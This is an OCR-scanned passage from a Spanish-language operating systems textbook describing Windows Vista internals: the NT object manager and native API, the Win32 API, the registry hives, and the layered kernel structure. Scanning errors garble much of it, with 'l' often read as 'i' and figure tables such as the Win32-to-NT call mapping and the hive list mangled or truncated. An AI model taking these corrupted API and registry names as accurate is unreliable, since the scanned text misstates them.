da objeto en modo de kernel tiene un tipo definido por el sistema, tiene operaciones bien definidas 
y ocupa almacenamiento en la memoria del kernel. Aunque los programasen modo de usuario pue¬ 
den realizar las operaciones (mediante las llamadas al sistema), no pueden acceder a los datos de 
manera directa. 

La figura 11-9 presenta un muestreo de lasAPIs, nativas, todas las cuales utilizan manejado- 
res explícitos para manipular objetos en modo dekernel como procesos, hilos, puertos I PC y sec¬ 
ciones (que se utilizan para describir objetos de memoria que se pueden asignar en espacios de 
direcciones). NtcreateProcess devuelve un manejador para el objeto de un proceso recién creado, 
el cual representa una instancia de ejecución del programa representado por sectionHandie. oebug- 
portHandie se Utiliza para comunicarse con un depurador cuando se le otorga el control del proceso 
después de una excepción (por ejemplo, división entre cero o acceso a memoria inválida). Except- 
portHandie se Utiliza para comunicarse con un proceso del subsistema cuando ocurren errores, y és¬ 
tos no se manejan mediante un depurador adjunto. 



Figura 11-9. Ejemplos de llamadas de la A Pl nativa de NT que utilizan manejadores 
para manipular objetos entre los límites de los procesos. 
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NtcreateThread toma a procHandie debido a que puede crear un subproceso en cualquier pro¬ 
ceso para el que el proceso que hizo la llamada tenga un manejador (con suficientes permisos de 
acceso). De manera similar, NtAllocateVirtualMemony, NtMapViewOfSection, NtReadVirtualMemory 
y NtwnitevirtuaiMemony permiten que un proceso opere no sólo en su propio espacio de direccio¬ 
nes, sino que también asigne direcciones virtuales y secciones de mapas, y que lea o escriba en la 
memoria virtual en otros procesos. NtcreateFiie es la llamada de la API nativa para crear o abrir 
un archivo. NtoupiicateObject es la llamada de la API para duplicar manejadoras de un proceso a 
otro. 

Desde luego que los objetos en modo de kernel no son únicos para Windows. Los sistemas 
UNIX también admiten una variedad de objetos en modo de kernel, como archivos, sockets de red, 
tuberías, dispositivos, procesos y herramientas de comunicación entre proceso (IPC) como memo¬ 
ria compartida, puertos de mensajes, semáforos y dispositivos de E/S. En UNIX hay una variedad 
deformas de denominar y acceder a los objetos, como los descriptores de archivos, los IDs de pro¬ 
ceso y los IDs enteros para objetos IPC de System V, y los nodos-i para los dispositivos. La imple- 
mentación de cada clase de objetos de UNIX es específica para esa clase. Los archivos y sockets 
utilizan distintas herramientas que los mecanismos, procesos o dispositivos IPC de System V. 

Los objetos del kernel en Windows utilizan una herramienta uniforme basada en manejadores 
en el espacio de nombres de NT para hacer referencia a objetos del kernel, junto con una implemen- 
tación unificada en un administrador de objetos central izado. Los manejadores corresponden a un 
proceso, pero comovimos antes, es posible duplicarlos en otro. El administrador de objetos permi¬ 
te otorgarles nombres al momento de crearlos y después abrirlos por nombre para obtener maneja¬ 
dores para ellos. 

El administrador de objetos utiliza Unicode (caracteres extensos) para representar nombres en 
el espacio de nombres de NT. A diferencia de UNIX, NT por lo general no distingue letras mayús¬ 
culas y minúsculas (preserva el uso de mayúsculas y minúsculas pero es insensible a mayúsculas y 
minúsculas). El espacio de nombres de NT es una colección jerárquica de directorios estructurada 
en forma de árbol, vínculos simbólicos y objetos. 

El administrador de objetos también ofrece herramientas unificadas para la sincronización, la 
seguridad y la administración del tiempo de vida de los objetos. La decisión de que las herramien¬ 
tas generales que proporciona el administrador de objetos estén disponibles para los usuarios de un 
objeto específico es responsabilidad de los componentes ejecutivos, ya que son ellos quienes pro¬ 
porcionan lasAPIs nativas que manipulan el tipo de cada objeto. 

No sólo el administrador de objetos administra a las aplicaciones que utilizan objetos: el siste¬ 
ma operativo mismo puede creary utilizar objetos también, y lo hacecon mucha frecuencia. La ma¬ 
yoría de estos objetos se crean para permitir que un componente del sistema almacene cierta 
información durante un periodo considerable, o para pasar cierta estructura de datos a otro compo¬ 
nente, y aun así beneficiarse del soporte de nomenclatura y tiempo de vida del administrador de ob¬ 
jetos. Por ejemplo, cuando se descubre un objeto se crean uno o más objetos de dispositivo para 
representar al dispositivo y describir en forma lógica cómo está conectado el dispositivo al resto del 
sistema. Para controlar el dispositivo se carga un driver, y se crea un objeto dedriver que contie¬ 
ne sus propiedades y proporciona apuntadores a las funciones que i mpl ementa para procesarlas pe¬ 
ticiones de E/S. Dentro del sistema operativo, para hacer referencia al driver se utiliza su objeto. 
También se puede acceder al driver de manera directa por su nombre, en vez de hacerlo de manera 
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indirecta a través de ios dispositivos que controia (por ejempio, para estabiecer parámetros que go¬ 
biernan su operación desde ei modo de usuario). 

A diferencia de U NIX, que coloca la raíz de su espacio de nombres en el sistema de archivos, 
la raíz del espacio de nombres de NT se mantiene en la memoria virtual del kernel. Esto significa 
que NT debe recrear su espacio de nombres de nivel superior cada vez que se inicia el sistema. El 
uso de memoria virtual del kernel permite a NT almacenar información en el espacio de nombres 
sin tener que iniciar primero el sistema de archivos en ejecución. Además, es mucho más fácil pa¬ 
ra NT agregar nuevos tipos de objetos en modo de kernel al sistema, debido a que los formatos de 
los mismos sistemas de archivos no se tienen que modificar para cada nuevo tipo de objeto. 

Un objeto con nómbrese puede marcar como permanente, lo cual significa que continúa exis¬ 
tiendo hasta que se elimina de manera explícita o el sistema se reinicia, aun si no hay un proceso en 
ese momento que tenga un manejador para el objeto. Dichos objetos pueden incluso extender el es¬ 
pacio de nombres de NT al proporcionar rutinas de análisis que permitan a los objetos funcionar 
en forma parecida a los puntos de montaje en UNIX. Los sistemas de archivos y el registro utili¬ 
zan esta herramienta para montar volúmenes y grupos masivos de archivos (hives) en el espacio de 
nombres de NT. Al acceder al objeto del dispositivo para un volumen, se obtiene acceso al volumen 
puro, pero el objeto del dispositivo también representa un montaje implícito del volumen en el es¬ 
pacio de nombres de NT. Para acceder a los archivos individuales en un volumen hay que concate¬ 
nar el nombre de archivo relativo al volumen, al final del nombre del objeto del dispositivo para ese 
volumen. 

Los nombres permanentes también se utilizan para representar los objetos de sincronización y 
la memoria compartida, de manera que los procesos puedan compartirlos sin tener que recrearlos 
de manera continua, a medida que los procesos se detengan e inicien. Los objetos de dispositivos, 
y a menudo los objetos de drivers, reciben nombres permanentes, con lo cual obtienen algunas 
de las propiedades de persistencia de los nodos-i especiales que se mantienen en el directorio /dev de 
UNIX. 

En la siguiente sección describiremos muchas más de las características en la API nativa de NT, 
donde analizaremos las APIs Win32 que proporcionan envolturas alrededor de las llamadas al sis¬ 
tema de NT. 

11.2.2 La interfaz de programación de aplicaciones Win32 

Las llamadas a las funciones Win32 se conocen en forma colectiva como API Win32. Estas in¬ 
terfaces se divulgan en forma pública y están documentadas en su totalidad. Se implementan como 
procedimientos de biblioteca que envuelven las llamadas al sistema nativas de NT empleadas para 
realizar el trabajo o, en algunos casos, realizan el trabajo en modo de usuario. Aunque las APIs na¬ 
tivas de NT no se publican, la mayor parte de la funcionalidad que ofrecen se puede utilizar a tra¬ 
vés de la API Win32. Las llamadas existentes a la API Win32 cambian en raras ocasiones con las 
nuevas versiones de Windows, aunque se agregan muchas nuevas funciones a la API. 

La figura 11-10 muestra varias llamadas de bajo nivel a la API Win32 y las llamadas nativas a 
la API de NT que envuelven. Lo interesante de esta figura es lo poco interesante de la asignación. 
La mayoría de las funciones Win32 de bajo nivel tienen equivalentes nativos en NT, lo cual no es 
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sorpresa, ya que Win32 se diseñó con NT en mente. En muchos casos, el nivel Win32 debe mani¬ 
pular los parámetros de Win32 para asignarlos en NT. Por ejemplo, utilizar los nombres de ruta ca¬ 
nónicos y asignarlos a los nombres de ruta apropiados de NT, incluyendo los nombres de 
dispositivos especiales deM S-DOS (como LPT:). LasAPIs Win32 para crear procesóse hilos tam¬ 
bién deben notificar al proceso del subsistema Win32 llamado csrss.exe que hay nuevos procesos e 
hilos para que los supervise, como veremos en la sección 11.4. 


Llamada a Win32 

Llamada a la API 
nativa de NT 

CUffllOPrOciOti 

NlCrniaílljPtOCWS 

G(ie4lQTfir«ad 

NtCrsabB'Thrvad 

SuspewfThraad 

NtSuspencíThread 

[>&alBSeimBphDre 


RiúJiitlFíle' 

MiReadFilú 

□«te^aFile 

NiSfilInlürmialionFiPe 


MlCrflOloSCfCliOO 

VírUfAWtoc 

NIAJlccálíVimjnlM^mflry 

MapV«i«Offil0 

NIMapVlpwQSSBClion 

DuphcaleHarKlte 

NtCuplicalBObjBCI 

CfcjiwHancile 

MC4Ci3« 


Figura 11-10. Ejemplos de llamadas a laAPI Win32 y las llamadas a laAPI nativa de 
NT que envuelven. 

Algunas llamadas a Win32 reciben nombres de rutas, mientras que las llamadas equivalentes a 
NT utilizan manejadoras. Por lo tanto, las rutinas envolventes tienen que abrir los archivos, llamar 
a NT y después cerrar el manejador al final. Las envolturas también traducen lasAPIs de Win32 de 
ANSI a Unicode. Las funciones de Win32 que se muestran en la figura 11-10 y utilizan cadenas co¬ 
mo parámetros son en realidad dos APIs; por ejemplo, CreateProcessW y CreateProcessA. Las 
cadenas que se pasan a la segunda API se deben traducir a Unicode antes de llamar a laAPI de NT 
subyacente, ya que NT sólo funciona con U nicode. 

Como se realizan pocos cambios a las interfaces de Win32 existentes en cada nueva versión de 
Windows, en teoría los programas binarios que se ejecutaban de manera correcta en cualquier ver¬ 
sión anterior seguirán ejecutándose en forma correcta en una nueva versión. A menudo, en la prác¬ 
tica hay muchos problemas de compatibilidad con las nuevas versiones. Windows es tan complejo 
que unos cuantos cambios que parecen inconsecuentes pueden provocar fallas en las aplicaciones. 
Y a menudo hay que culpar a las mismas aplicaciones, ya que con frecuencia realizan comproba¬ 
ciones explícitas para versiones específicas del SO o caen víctimas de sus propios errores latentes 
que se exponen al ejecutarlas en una nueva versión. Sin embargo, M icrosoft hace un esfuerzo en 
cada versión por evaluar una amplia variedad de aplicaciones, buscar incompatibilidades y corre¬ 
girlas o proveer soluciones específicas para la aplicación. 

Windows proporciona dos entornos de ejecución especiales, conocidos como Windows sobre 
Windows (WOW). WOW32 se utiliza en los sistemas x86 de 32 bits para ejecutar aplicaciones de 
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Windows 3.x, mediante ia asignación de ias iiamadas ai sistema y ios parámetros entre ios mundos 
de 16 bits y de 32 bits. De manera simiiar, WOW64 permite ejecutar apiicaciones Windows de 32 
bits en sistemas x64. 

La fiiosofía de ia API de Windows es muy distinta de ia de UNIX. En esta última, las funcio¬ 
nes del si stema operativo son si mpl es, con pocos parámetros y pocos I ugares donde haya vari as for¬ 
mas de realizar la misma operación. Win32 ofrece interfaces muy extensas con muchos parámetros, 
a menudo con tres o cuatro formas de realizar lo mismo, y mezcla las funciones de bajo nivel con 
las de alto nivel, como CreateFile y CopyFile. 

Esto significa que Win32 ofrece un conjunto muy completo de interfaces, pero también intro¬ 
duce mucha complejidad debido a la mala distribución de los niveles de un sistema que entremez¬ 
cla las funciones de bajo nivel y de alto nivel en la misma API. Para nuestro estudio délos sistemas 
operativos, son relevantes sólo las funciones de bajo nivel de la API Win32 que envuelve a la API 
nativa de NT, por lo que nos enfocaremos en ellas. 

Win32 tiene llamadas para crear y administrar procesos e hilos. También hay muchas llamadas 
relacionadas con la comunicación entre procesos, como crear, destruir y utilizar mutexes, semáfo¬ 
ros, eventos, puertos de comunicación y otros objetos de IPC. 

Aunque gran parte del sistema de administración de la memoria es invisible para los programa- 
dores, hay una característica importante visible: la habilidad de un proceso de asignar un archivo a 
una región de su memoria virtual. Esto permite a los hilos que se ejecutan en un proceso la habilidad 
de leer y escribir partes del archivo mediante el uso de apuntadores, sin tener que realizar operacio¬ 
nes de lectura y escritura de manera explícita para transferir datos entre el discoy la memoria. En los 
archivos con asignación de memoria, el sistema de administración de memoria es el que realiza 
las operaciones de E/S según sea necesario (paginación bajo demanda). 

Para implementar los archivos con asignación de memoria, Windows utiliza tres herramientas 
completamente distintas. En primer lugar, proporciona interfaces que permiten a los procesos ad¬ 
ministrar su propio espacio de direcciones virtuales, incluyendo los rangos reservados de direccio¬ 
nes para usarlas después. En segundo lugar, Win32 proporciona una abstracción conocida como 
asignación de archivos, que se utiliza para representar objetos direccionables como los archivos (a 
una asignación de archivo se le conoce como sección en el nivel de NT). La mayoría de las veces, 
las asignaciones de archivos se crean para hacer referencia a los archivos mediante el uso de un ma- 
nejador de archivo, pero también se pueden crear para hacer referencia a las páginas privadas que 
se asignan del archivo de páginas del sistema. 

La tercera herramienta asigna las vistas de las asignaciones de archivos en el espacio de direc¬ 
ciones de un proceso. Win32 permite crear sólo una vista para el proceso en curso, pero la herra¬ 
mienta subyacente de NT es más general y permite crear vistas de cualquier proceso para el que se 
tenga un manejador con los permisos apropiados. Separar la creación de una asignación de archivo 
de la operación de asignar el archivo al espacio de direcciones es un método distinto al que se uti¬ 
liza en la función mmap en UNIX . 

En Windows, las asignaciones de archivo son objetos en modo de kernel representados por un 
manejador. AI igual que la mayoría délos manej adores, las asignaciones de archivo se pueden dupli¬ 
car en otros procesos. Cada uno de estos procesos puede dirigir la asignación de archivo a su pro¬ 
pio espacio de direcciones, según le parezca apropiado. Esto es útil para compartir la memoria 
privada entre los procesos sin tener que crear archivos para compartirlos. En el nivel de NT, las 
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asignaciones de archivos (secciones) también se pueden hacer persistentes en ei espacio de nom¬ 
bres de NT, y se puede acceder a eiias por su nombre. 

Un área importante para muchos programas es ia E/S de archivos. En ia vista básica deWin32, 
un archivo essóio una secuencia iineai debytes. Win32 proporciona más de 60 iiamadas para crear 
y destruir archivos y directorios, abrir y cerrar archivos, ieery escribirán eiios, soiicitary estabie- 
cer atributos de archivos, bioquear rangos de bytes y muchas operaciones fundamentaies más, tan¬ 
to sobre ia organización dei sistema de archivos como sobre ei acceso a ios archivos individuaies. 

También hay herramientas avanzadas para administrar ios datos en ios archivos. Además dei 
fiujo de datos primario, ios archivos que se aimacenan en ei sistema de archivos NTFS pueden te¬ 
ner fiujos de datos adicionaies. Los archivos (e inciuso voiúmenes compietos) se pueden cifrar. Los 
archivos se pueden comprimir y/o representar como un fiujo disperso de bytes donde ias regiones 
de datos faitantes en ia parte media no ocupan espacio deaimacenamiento en ei disco. Los voiúme¬ 
nes dei sistema de archivos se pueden organizar desde varias particiones de disco separadas, me¬ 
diante ei uso de varios niveies de aimacenamiento RAID. Las modificaciones a ios subárboies de 
archivos o directorios se pueden detectar a través de un mecanismo de notificación, o mediante ia 
iectura dei registro de transacciones que ei NTFS mantiene para cadavoiumen. 

Cada voiumen dei sistema de archivos se monta de manera impiícita en ei espacio de nombres 
de NT, de acuerdo con ei nombre que se da ai voiumen; por ejempio, un archivo \foo\bar se podría 
iiamar \Dispositivo\VoiumenDiscoDuro\foo\bar. En cada voiumen dei NTFS se proporcionan de 
manera interna puntos de montaje (iiamados puntos de reanáiisis en Windows) y víncuios simboii- 
cos para ayudar a organizar ios voiúmenes individuaies. 

Ei modeio de E/S de bajo nivei en Windows es básicamente asincrono. Una vez que se inicia 
una operación de E/S, ia iiamada ai sistema puede regresar para permitir que ei hiio que inició ia 
E/S continúe en paraieio con ia operación de E/S. Windows admite ia canceiación, así como varios 
mecanismos distintos para sincronizar ios hiios con ias operaciones de E/S cuando se compietan. 
Windows también permite que ios programas especifiquen que ia E/S deba ser síncrona ai abrir un 
archivo, y muchas funciones de bibiioteca (como ia bibiioteca de C y muchas iiamadas a Win32) 
especifican ia E/S síncrona por compatibiiidad o para simpiificar ei modeio de programación. En 
estos casos, ei ejecutivo se sincronizará de manera expiícita con ia compieción de ia E/S antes de 
regresar ai modo de usuario. 

La seguridad es otra área en ia que Win32 proporciona iiamadas. Cada hiio se asocia con un 
objeto en modo de kernei conocido como token, ei cuai proporciona información sobre ia identi¬ 
dad y ios priviiegios asociados con ei hiio. Cada objeto puede tener una ACL (Access Controi List, 
Lista de controi de acceso) que indique con gran detaiie y precisión qué usuarios tienen acceso y 
cuáies operaciones pueden reaiizar. Este método ofrece una seguridad muy detaiiada, en ia que se 
puede permitir o prohibir a determinados usuarios ei acceso específico a cada objeto. Ei modeio de 
seguridad es extensibie, io cuai permite a ias apiicaciones agregar nuevas regias de seguridad, co¬ 
mo iimitar ias horas que se permite ei acceso. 

Ei espacio de nombres de Win32 es distinto ai espacio de nombres nativo de NT que se descri¬ 
be en ia sección anterior. Sóio aigunas partes dei espacio de nombres de NT son visibies para ias 
APIS deWin32 (aunquese puede acceder al espacio de nombres completo de NT por medio de una 
alteración de Win32 que utiliza cadenas de prefijos especiales, como "\\."). En Win32, el acceso a 
los archivos es relativo a las letras de unidades. El directorio de NT \DosDevices contiene un con- 
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junto de vínculos simbólicos de las letras de unidades a los objetos de dispositivos actuales. Por 
ejemplo, \DosDevices\C: podría ser un vínculo a \Device\H arddiskVolumel. Este directorio tam¬ 
bién contiene vínculos para otros dispositivos Win32, como COMI:, LPTl: y NU L: (para los puer¬ 
tos serial y de impresora, y el importantísimo dispositivo nulo). En realidad, \DosDevices es un 
vínculo simbólico para \??, que se seleccionó por cuestión de eficiencia. Hay otro directorio de NT 
llamado \BaseNamedObjects, empleado para almacenar objetos diversos en modo de kernel que se 
pueden utilizar mediante la API Win32; éstos incluyen objetos de sincronización como semáforos, 
memoria compartida, temporizadoresy puertos de comunicación, nombres de M S-DOS y de dispo¬ 
sitivos. 

Además de las interfaces del sistema de bajo nivel que hemos descrito, laAPI Win32 también 
proporciona muchas funciones para las operaciones de la GUI, incluyendo todas las llamadas pa¬ 
ra administrar la interfaz gráfica del sistema. Hay llamadas para crear, destruir, administrar y uti¬ 
lizar ventanas, menús, barras de herramientas, barras de desplazamiento, cuadros de diálogo, 
iconos y muchos elementos más que aparecen en la pantalla. Hay llamadas para dibujar figuras 
geométricas, rellenarlas, administrar las paletas de colores que utilizan, gestionar con las fuentes 
y colocar iconos en la pantalla. Por último, hay llamadas para gestionar el teclado, el ratón y otros 
dispositivos de entrada humana, así como dispositivos de audio, de impresión y de salida. 

Las operaciones de la GUI trabajan directamente con el driver win32k.sys mediante el uso de 
interfaces especiales para acceder a estas funciones en modo de kernel, desde las bibliotecas en mo¬ 
do de usuario. Como estas llamadas no involucran a las llamadas al sistema básicas en el ejecutivo 
de NTOS, no hablaremos más sobre ellas. 


11.2.3 El registro de Windows 

La raíz del espacio de nombres de NT se mantiene en el kernel. El almacenamiento (como los vo¬ 
lúmenes del sistema de archivos) se adjunta al espacio de nombres de NT. Como dicho espacio se 
construye desde cero cada vez que el sistema se inicia, ¿cómo sabe el sistema sobre cualquier de¬ 
talle específico de la configuración del sistema? La respuesta es que Windows adjunta un tipo es¬ 
pecial de sistema de archivos (optimizado para archivos pequeños) al espacio de nombres de NT. A 
este sistema de archivos se le conoce como el registro. Este registro está organizado en volúmenes 
separados, conocidos como grupo masivo de archivos (hives). Cada grupo masivo de archivos se 
mantiene en un archivo separado (en el directorio C:\Windows\system32\config\ del volumen de ini¬ 
cio). Cuando se inicia un sistema Windows, se carga en memoria un grupo masivo de archivos es¬ 
pecífico llamado SYSTEM mediante el mismo programa de inicio que carga el kernel y otros 
archivos de inicio (como los drivers de inicio) del volumen de inicio. 

Windows mantiene una gran cantidad de información crucial en el grupo masivo de archivos 
llamado SYSTEM , incluyendo información sobre qué drivers usar con cuáles dispositivos, qué soft¬ 
ware ejecutar al principio y muchos parámetros que gobiernan la operación del sistema. Incluso el 
programa de inicio mismo utiliza esta información para determinar cuáles drivers que se necesitan 
de inmediato al momento del arranque: dichos drivers incluyen a los que comprenden el sistema de 
archivos, y a los drivers de disco para el volumen que contiene el sistema operativo mismo. 
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Después de que el sistema inicia, se utiiizan otros grupos masivos de archivos de configuración 
para describir i a información sobre ei software instaiado en ei sistema, ios usuarios específicos y i as 
ciases de objetos COM (Component Object-Modei, M odeio de objetos componentes) en modo de 
usuario que se instaian en ei sistema. La información de inicio de sesión para ios usuarios iocaies se 
mantiene en ei grupo masivo de archivos SAM (Administrador de Cuentas de Seguridad, Security Ac¬ 
cess M anager). La información para ios usuarios de red se mantiene mediante ei servicio isass en ei 
hive SECURITY, y se coordina con ios servidores de directorio de red para que ios usuarios puedan 
tener un nombre de cuenta común y una contraseña en toda una red compieta. En ia figura 11-11 se 
muestra una iista de ios grupos masivos de archivos que se utiiizan en Windows Vista. 


Archivo de grupo 
masivo de archivos 

Nombre ai 
estar montado 

Uso 

SYSTEM 

HKLM TEM 

Información de configuración del SO; el kernel 
la utiliza 

HARDWARE 

HKLM DWARE 

Hardware de grabación de grupos de archivos 
masivos en memoria detectado 

BCD 

HKLM BCD* 

Base de datos de configuración de inicio 

SAM 

HKLM 

Información de cuentas de usuario locales 

SECURITY 

HKLM URITY 

Información de cuentas de Isass y demás infor¬ 
mación de seguridad 

DEFAULT 

H KEY_US E RS. D E FAU LT 

Grupo masivo de archivos predeterminado pa¬ 
ra los usuarios nuevos 

NTUSER.DAT 

HKEY_USERS <id usuario> 

Grupo masivo de archivos específico de cada 
usuario, se mantiene en el directorio de inicio 

SOFTWARE 

HKLM TWARE 

Clases de aplicaciones registradas por COM 

COMPONENTS 

HKLM NENTS 

Manifiestos y dependencias para los compo¬ 
nentes del sistema 


Figura 11-11. Los grupos de archivos masivos del registro en Windows Vista. HK LM 
es abreviación deHKEY_LOCAL_MACHINE. 


Antes de ia introducción dei registro, ia información de configuración en Windows se mante¬ 
nía en cientos de archivos .ini (iniciaiización) esparcidos en todo ei disco. Ei registro recopiia estos 
archivos en un depósito centrai, disponibieen ias primeras etapas dei proceso de inicio dei sistema. 
Esto es importante para impiementar ia funcionaiidad piug-and-piay de Windows. Pero ei registro 
se ha vueito muy desorganizado a medida que Windows evoiuciona. Hay convenciones mai defini¬ 
das sobre ia forma en que se debe ordenar ia información, y muchas aplicaciones utiiizan una me- 
todoiogía ad hoc. La mayoría de ios usuarios, ias apiicacionesy todos ios drivers operan con todos 
ios priviiegios, y con frecuencia modifican parámetros dei sistema directamente en ei registro: ai- 
gunas veces interfieren unos con otros y se desestabiiiza ei sistema. 

Ei registro es una extraña cruza entre un sistema de archivos y una base de datos, y ai mismo 
tiempo no se parece a ninguno de ios dos. Se han escrito iibros compietos para describir ei registro 
(Born, 1998; Hipson, 2000; Ivens, 1998), y han surgido muchas empresas para vender software es- 
peciai sóio para administrar ia compiejidad dei registro. 
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Para explorar el registro, Windowstieneun programa deGUI llamado regedit, el cual nos per¬ 
mite abrir y explorar los directorios (conocidos como claves) y los elementos de datos (conocidos 
como valores). El nuevo lenguaje de secuencias de comandos PowerShell de M icrosoft también se 
puede utilizar para recorrer las claves y los valores del registro como si fueran directorios y archi¬ 
vos. Es más interesante utilizar la herramienta procmon, que está disponible en el sitio Web de he¬ 
rramientas de M icrosoft: www.microsoft.com/technet/sysinternals. 

Procmon vigila todos los accesos al registro que se llevan a cabo en el sistema, y es muy reve¬ 
lador. Algunos programas acceden a la misma clave decenas de miles de veces. 

Como su nombre lo indica, regedit permite a los usuarios editar el registro, pero deben tener 
mucho cuidado si alguna vez lo hacen. Es muy fácil dejar el sistema incapacitado para iniciarse, o 
dañar la instalación de aplicaciones que no se pueden corregirá menos que se utilice mucha magia. 
M icrosoft prometió limpiar el registro en las versiones futuras, pero por ahora es un enorme desas¬ 
tre: mucho más complicado que la información de configuración que se mantiene en U NIX. 

Empezando con Windows Vista, M icrosoft introdujo un administrador de transacciones basa¬ 
do en el kernel, con soporte para las transacciones coordinadas que abarcan tanto el sistema de ar¬ 
chivos como las operaciones del registro. M icrosoft planea utilizar esta herramienta en el futuro 
para evitar algunos de los problemas de corrupción de los metadatos que ocurren cuando la insta¬ 
lación de software no se completa de manera correcta y deja un estado parcial en los directorios del 
sistema y los grupos masivos de archivos del registro. 

El programador de Win32 puede acceder al registro. Hay llamadas para crear y eliminar claves, 
buscar valores dentro de las claves y mucho más. A Igunas de las más útiles se listan en la figura 11.12. 


Función de la API Win32 

Descripción 

RegCreateKeyEx 

Crea una clave en el registro 

RegDeleteKey 

Elimina una clave del registro 

RegOpenKeyEx 

Abre una clave para obtener un manejador para ella 

RegEnumKeyEx 

Enumera las subclaves subordinadas a la clave del manejador 

RegQueryValueEx 

Busca los datos para un valor dentro de una clave 


Figura 11-12. Algunas de las llamadas a laAPI Win32 para utilizar el registro. 


Cuando el sistema se apaga, la mayor parte de la información del registro se almacena en dis¬ 
co, en los grupos masivos de archivos. Debido a que su integridad es tan imprescindible para que 
el sistema funcione de manera correcta, se realizan respaldos de manera automática y las escrituras 
de metadatos se vacían en el disco para evitar la corrupción en caso de una falla del sistema. Si se 
pierde el registro hay que reinstalar todo el software en el sistema. 


11.3 ESTRUCTURA DEL SISTEMA 

En las secciones anteriores examinamos Windows Vista desde el punto de vista del programador 
que escribe código para el modo de usuario: ahora analizaremos los detalles internos de la organi¬ 
zación del sistema, lo que hacen los diversos componentes y la forma en que interactúan entre sí y 
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con los programas de usuario. Ésta es la parte del sistema que ve el programador que implemento 
código en modo de usuario de bajo nivel, como los subsistemas y servicios nativos, así como la vis¬ 
ta del sistema que tienen los escritores de drivers de dispositivos. 

Aunque hay muchos libros sobre cómo utilizar Windows, no hay tantos sobre cómo funciona. 
Una de las me] ores fuentes para buscar información adicional sobre este tema es M i crosoft Windows 
Internáis, 4a edición (Russinovich y Solomon, 2004). Este libro describe a Windows XP, pero la 
mayor parte de la descripción sigue siendo precisa, ya que en el interior, Windows X P y Windows 
Vista son muy similares. 

Además, M icrosoft tiene información disponible sobre el kernel de Windows para los miem¬ 
bros docentes y los estudiantes en universidades por medio del Programa Académico de Windows. 
Este programa proporciona el código fuente para la mayor parte del kernel de Windows Server 
2003, los documentos de diseño originales de NT del equipo de Cutler y un extenso conjunto de 
materiales de presentación que se derivan del libro Windows Internáis. El WindowsDriverKittam- 
bién ofrece mucha información sobre el funcionamiento interno del kernel, ya que los drivers de 
dispositivos no sólo utilizan las herramientas de E/S, sino también los procesos, hilos, la memoria 
virtual y la IPC. 

11.3.1 Estructura del sistema operativo 

Como vimos antes, el sistema operativo Windows Vista consiste en muchos niveles, como se mues¬ 
tra en la figura 11-6. En las siguientes secciones entraremos en detalles con respecto a los niveles 
más bajos del sistema operativo: los que se ejecutan en modo de kernel. El nivel central es el mis¬ 
mo kernel NTOS, que se carga desde ntoskrnl.exe cuando Windows inicia. NTOS tiene dos nive¬ 
les: el ejecutivo que contiene la mayoría de los servicios, y un nivel más pequeño que (también) se 
conoce como kernel y es el que implemento las abstracciones de programación y sincronización de 
hilos subyacentes (¿un kernel dentro del kernel?); también implemento los manejadores de trampas, 
las interrupciones y otros aspectos sobre la forma en que se administra la CPU. 

La división de NTOS en kernel y ejecutivo es una reflexión de las raíces de VAX/VM S en NT. 
El sistema operativo VMS, que también fue diseñado por Cutler, tenía cuatro niveles implementa- 
dos por el hardware: usuario, supervisor, ejecutivo y kernel, los cuales corresponden a los cuatro 
modos de protección que proporciona la arquitectura del procesador VAX. Las CPUs de Intel tam¬ 
bién proporcionan cuatro anillos de protección, pero algunos de los primeros procesadores de des¬ 
tino para NT no lo hacían, por lo que los niveles kernel y ejecutivo representan una abstracción 
implementada por software, y lasfuncionesqueVM S proporciona en el modo de supervisor (como 
la cola de impresión) se proveen en NT como servicios en modo de usuario. 

En la figura 11-13 se muestran los niveles en modo de kernel de NT. El nivel del kernel de 
NTOS se muestra por encima del nivel ejecutivo, ya que implementa los mecanismos de trampa e 
interrupción que se utilizan para pasar del modo de usuario al modo de kernel. El nivel más supe¬ 
rior en la figura 11-13 es la biblioteca del sistema ntdll.dll, que en realidad se ejecuta en modo de 
usuario. La biblioteca del sistema incluye varias funciones de soporte para las bibliotecas en tiem¬ 
po de ejecución y de bajo nivel del compilador, de manera similar a lo que hace libe en UNIX. La 
biblioteca ntdll.dll también contiene puntos de entrada de código especiales que el kernel utiliza 
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Modo de usuario 
Modo de kernel 


Hardware 


Rutinas de despacho en modo de usuario del kernel de la biblioteca del sistema (ntdll.dll) 


Nivel del 
kernel de 
NTOS 


Diivers 

sistemas de archi¬ 
vos, administrador 
de volumen, pilas 
TCP/IP, interfaces 
de red dispositivos 
gráficos, todos los 
demás dispositivos 


CPU, MMU, controladores de interrupciones, memoria, dispositivos 


Procesos e hilos 

Memoria virtual 

Administrador 
de objetos 

Administrador 
de configuración 

LPC 

Administrador 
de caché 

Administrador 
de E/S 

Monitor de 
seguridad 

Biblioteca en tiempo de ejecución del ejecutivo 


Nivel del ejecutivo de NTOS 


Nivel de abstracción de hardware 


Despacho de trampas/excepciones/interrupciones 


Programación y sincronización de la CPU: hilos, ISRs, DCPs, APCs 


Figura 11-13. Organización de Windows en modo de kernei. 


para inicializar hilos y despachar las excepciones y las APCs (Asynchronous Procedure Calis, Lla¬ 
madas a procedimientos asincronas) en modo de usuario. Como la biblioteca del sistema es tan in¬ 
tegral para la operación del kernel, cada proceso en modo de usuario creado por NTOS tiene 
asignada la biblioteca ntdll en la misma dirección fija. Cuando NTOS inicializa el sistema, crea un 
objeto de sección para usarlo al asignar ntdll, y también registra las direcciones de los puntos de en¬ 
trada de ntdll que el kernel utiliza. 

Debajo de los niveles kernel y ejecutivo de NTOS hay un software conocido como HAL 
(Hardware Abstraction Layer, Nivel de abstracción de hardware), que abstrae los detalles del hard¬ 
ware de bajo nivel, como el acceso a los registros de dispositivos y las operaciones de DMA, y la 
forma en que el firmware del BIOS representa la información de configuración y lidia con las dife¬ 
rencias en los chips de soporte de la CPU, como varios controladores de interrupción. El BIOS es¬ 
tá disponible a través de varias empresas, y se integra en memoria persistente (EEPROM) que 
reside en la tarjeta principal de la computadora. 

Los otros componentes principales en modo de kernel son los drivers de dispositivos: Windows 
los utiliza para cualquier herramienta en modo de kernel que no forma parte del NTOS o del HAL. 
Esto incluye a los sistemas de archivos y las pilas del protocolo de red, y las extensiones del kernel 
como el software antivirus y DRM (Digital Rights M anagement. Administración de los derechos 
digitales), así como drivers para administrar los dispositivos físicos o actuar como interfaz para los 
busesdel hardware, por ejemplo. 

Los componentes de E/S y de memoria virtual cooperan para cargar (y descargar) controlado- 
res de dispositivos a la memoria del kernel y enlazarlos a los niveles del NTOS y HAL. El admi¬ 
nistrador de E/S proporciona interfaces que permiten descubrir, organizar y operar dispositivos 
